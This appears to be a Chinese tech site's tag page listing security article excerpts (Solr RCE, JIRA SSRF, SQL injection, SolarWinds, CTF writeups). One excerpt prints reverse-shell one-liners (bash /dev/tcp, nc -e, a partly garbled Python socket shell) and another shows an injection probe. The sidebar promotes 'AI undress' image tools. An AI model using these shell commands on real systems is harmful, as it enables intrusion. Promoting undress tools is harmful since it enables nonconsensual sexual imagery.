搜尋
Article Tags
安全
Apache Solr velocity模板注入RCE漏洞的範例分析

Apache Solr velocity模板注入RCE漏洞的範例分析

0x01簡介Solr是一個獨立的企業級搜尋應用程式伺服器,它對外提供類似Web-service的API介面。使用者可以透過http請求,向搜尋引擎伺服器提交一定格式的XML文件,產生索引;也可以透過HttpGet操作提出查找請求,並取得XML格式的回傳結果。 0x02漏洞介紹Solr中存在VelocityResponseWriter組件,攻擊者可以構造特定請求修改相關配置,使VelocityResponseWriter組件允許加載指定模板,進而導致Velocity模版註入遠程命令執行漏洞,攻擊者利用該

May 19, 2023 am 10:37 AM
Solr Velocity
利用JIRA漏洞存取美軍非保密網際網路協定路由器網的範例分析

利用JIRA漏洞存取美軍非保密網際網路協定路由器網的範例分析

以下講述了作者在參與美國國防部(DoD)HackthePentagon漏洞眾測計畫中,利用JIRA漏洞CVE-2017-9506構造了SSRF攻擊面,實現了對美軍非保密因特網協議路由器網(NIPRnet)的訪問,並且結合其它漏洞技巧,取得到DoD內網系統的一系列敏感資訊。由於測試過程和內容的涉密性,該篇文章僅點到為止,未對過多技術細節和詳細場景作出披露,僅當學習分享,還望讀者多多包涵。 JIRA是澳洲Atlassian公司開發的一款優秀的問題追蹤管理軟體工具,可以對各種類型的問題進行追蹤管理,

May 18, 2023 pm 10:29 PM
jira
SQL注入類型有哪些

SQL注入類型有哪些

前言SQL注入的攻擊方式依應用程式處理資料庫回傳內容的不同,可分為可顯注入、報錯注入和盲注。可顯注入攻擊者可以直接在目前介面內容中取得想要獲得的內容。報錯注入資料庫查詢回傳結果並沒有在頁面中顯示,但是應用程式將資料庫報錯資訊列印到了頁面中,所以攻擊者可以建構資料庫報錯語句,從報錯資訊中取得想要取得的內容。盲注資料庫查詢結果無法從直覺頁面中獲取,攻擊者透過使用資料庫邏輯或使資料庫庫執行延時等方法來獲取想要獲得的內容。 Mysql手工注入lian合注入?id=1'orderby4--

May 18, 2023 pm 10:05 PM
SQL
反彈shell有哪些

反彈shell有哪些

1.bash反彈bash-i>&/dev/tcp/ip_address/port0>&12.nc反彈nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socketet.AF.Tocket,subprocess,oss=socket.socket(socketet.AF.Tocket,Tocket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

May 18, 2023 pm 10:01 PM
shell
NSA新型APT框架DarkPulsar怎麼用

NSA新型APT框架DarkPulsar怎麼用

前言2017年3月,ShadowBrokers放出了一份震驚世界的機密文檔,其中包括兩個框架:DanderSpritz和FuzzBunch。 DanderSpritz完全由插件組成,用於收集情報、利用漏洞和操控已接管的設備。它是基於Java編寫,提供類似殭屍網路管理面板的圖形介面以及類似Metasploit工具的控制面板。它還整合了用於非FuzzBunch受控設備的後門和插件。 DanderSprit介面概述Fuzzbunch為不同的實用程式提供了一個用於互動和協同工作的框架,包含各種類型的插件,其

May 18, 2023 pm 08:14 PM
nsaDarkPulsar
如何進行Ghostscript SAFER沙箱繞過漏洞的分析

如何進行Ghostscript SAFER沙箱繞過漏洞的分析

前言Ghostscript是一款AdobePostScript語言的解譯器軟體。可對PostScript語言進行繪圖,支援PS與PDF互相轉換。目前大多數Linux發行版中都預設安裝,並移植到了Unix、MacOS、Windows等平台,且Ghostscript也被ImagineMagic、PythonPIL和各種PDF閱讀器等程式所使用。漏洞描述8月21日,Google安全研究員TavisOrmandy揭露了多個GhostScript的漏洞,透過在圖片中建構惡意PostScript腳本,可以繞

May 18, 2023 pm 07:10 PM
ghostscriptSAFER
DDCTF2019两个逆向分别是什么

DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

May 18, 2023 pm 05:13 PM
DDCTFwriteup
繞過限制存取到Google內部管理系統的範例分析

繞過限制存取到Google內部管理系統的範例分析

蛛絲馬跡某天,在挖掘Google漏洞的過程中,我從公開的漏洞中發現了一些谷歌自身服務的IP位址,一開始,我真不知道這些IP位址能乾嘛。我就先檢查了一遍這些IP位址,進一步發現其中包含了一些谷歌的內部IP。我突然想起來,最近,我的朋友KLSREERAM上報過一個谷歌內部IP相關的漏洞,另一個朋友Vishnu則上報過了一個利用谷歌子域名訪問到控制面板的漏洞。目前,這兩個漏洞都已被Google修復,這兩個漏洞相關的內部IP位址也無法從網路上存取。但是,現在,在我面前就有幾個谷歌內部IP位址,我得想辦法來看看能不能

May 18, 2023 pm 03:19 PM
Google
如何實作Disk Pulse Eneterprise Window應用程式的漏洞分析

如何實作Disk Pulse Eneterprise Window應用程式的漏洞分析

一、漏洞簡介DiskPulseEneterprise是一款監視磁碟變化的軟體,它可以透過一個管理埠9120或web管理視窗80對軟體進行連線管理,從而監視磁碟的變更。在DiskPulseEneterprise中有一個動態連結庫libspp.dll,其中有一些負責HTTP操作的函數,問題就出現在這個動態連結庫中,在處理後資料時,由於對於後資料沒有進行嚴格的長度控制,導致在執行取得後資料時造成無效記憶體拷貝資料緩衝區溢出,觸發SEH異常行為處理,最後控制EIP,執行任意程式碼。軟體下載連結:h

May 18, 2023 pm 03:04 PM
windowDisk Pulse Eneterprise
APP崩潰的主要原因是什麼

APP崩潰的主要原因是什麼

一、什麼樣的場景下容易出現崩潰類問題最近腦子裡一直在想什麼樣的問題容易導致崩潰——那就是具有異常思維,舉個例子:正好前兩天看了一部美劇叫《菜鳥老警》,裡面有個場景是主角JohnNolan因為沒有用警車攔住逃犯的車而導致逃犯出逃,這個場景與測試有什麼關聯呢?首先正常人在馬路上行駛都會躲避避免與別人發生碰撞,這就好比測試功能的主流程,不會去亂點亂輸入;但是警察就不一樣了,他會為了抓住逃犯不顧一切,想盡一切辦法,這就好比測試過程中的異常思維,要思考怎麼樣操作使功能不好用。寶典一、異常操作各種異常操作

May 18, 2023 pm 01:55 PM
App
MySQL資料庫常用技巧有哪些

MySQL資料庫常用技巧有哪些

1、如何選擇伺服器的類型? MySQL伺服器設定視窗中各個參數的意義如下。 【ServerConfigurationType】此選項用於設定伺服器的類型。點選該選項右側的向下按鈕,即可看到包含3個選項。 3個選項的具體意義如下:DevelopmentMachine(開發機器):此選項代表典型個人用桌面工作站。假定機器上運行著多個桌面應用程式。將MySQL伺服器配置成使用最少的系統資源。 ServerMachine(伺服器):此選項代表伺服器,MySQL伺服器可以與它應用程式一起執行,例如FTP、ema

May 18, 2023 pm 01:29 PM
MySQL
SolarWinds供應鏈APT攻擊事件安全風險的範例分析

SolarWinds供應鏈APT攻擊事件安全風險的範例分析

背景12月13日,美國頂級安全公司FireEye(中文名:火眼)發布報告稱,其發現一起全球性入侵活動,命名該組織為UNC2452。該APT組織透過入侵SolarWinds公司,在SolarWindsOrion商業軟體更新包中植入惡意程式碼,進行分發,FireEye稱之為SUNBURST惡意軟體。此後門包含傳輸檔案、執行檔、分析系統、重新啟動機器和停用系統服務的能力,從而到達橫向移動和資料竊取的目的。 SolarWindsOrionPlatform是一個強大、可擴展的基礎架構監視和管理平台,它用於以單一

May 18, 2023 pm 12:52 PM
aptsolarwinds
vBulletin 5.x 遠端程式碼執行漏洞的範例分析

vBulletin 5.x 遠端程式碼執行漏洞的範例分析

vBulletin元件介紹vBulletin是論壇和社群發佈軟體的全球領導者。其安全性,強大的管理功能和速度,可為40,000多個線上社群提供服務等特質備受客戶青睞。很多大型論壇都選擇vBulletin作為自己的社群。從vBulletin官方網站所展示的客戶名單可以得知,著名的遊戲製作公司EA、著名的遊戲平台Steam、日本大型跨國企業Sony、以及美國NASA等均為其客戶,vBulletin高效,穩定,安全,在中國也有很多大型客戶,如蜂鳥網,51團購,海洋部落等在線上萬人的論壇都用vBull

May 18, 2023 am 11:46 AM
vBulletin
Google在主動攻擊下修復Chrome 0-day漏洞的範例分析

Google在主動攻擊下修復Chrome 0-day漏洞的範例分析

Google25日發布Chrome更新,修復三個安全漏洞,包括一個正遭到主動利用的0-day漏洞。關於這些攻擊的詳情以及該漏洞是如何被用於攻擊Chrome用戶的,尚未公開。這些攻擊是在2月18日被Google的威脅分析小組成員ClementLecigne發現的。 Google威脅分析小組是Google調查和追蹤威脅行為體群體的部門。 Chrome80.0.3987.122版本修正了該0-day漏洞。 Windows,Mac和Linux用戶都有可用的更新,但ChromeOS,iOS和Android用戶

May 18, 2023 am 11:25 AM
GoogleChrome 0-day

熱門工具標籤

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱工具

vc9-vc14(32+64位元)運行庫合集(連結在下方)

vc9-vc14(32+64位元)運行庫合集(連結在下方)

phpStudy安裝所需運行函式庫集合下載

VC9 32位

VC9 32位

VC9 32位元 phpstudy整合安裝環境運行庫

php程式設計師工具箱完整版

php程式設計師工具箱完整版

程式設計師工具箱 v1.0 php整合環境

VC11 32位

VC11 32位

VC11 32位元 phpstudy整合安裝環境運行庫

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用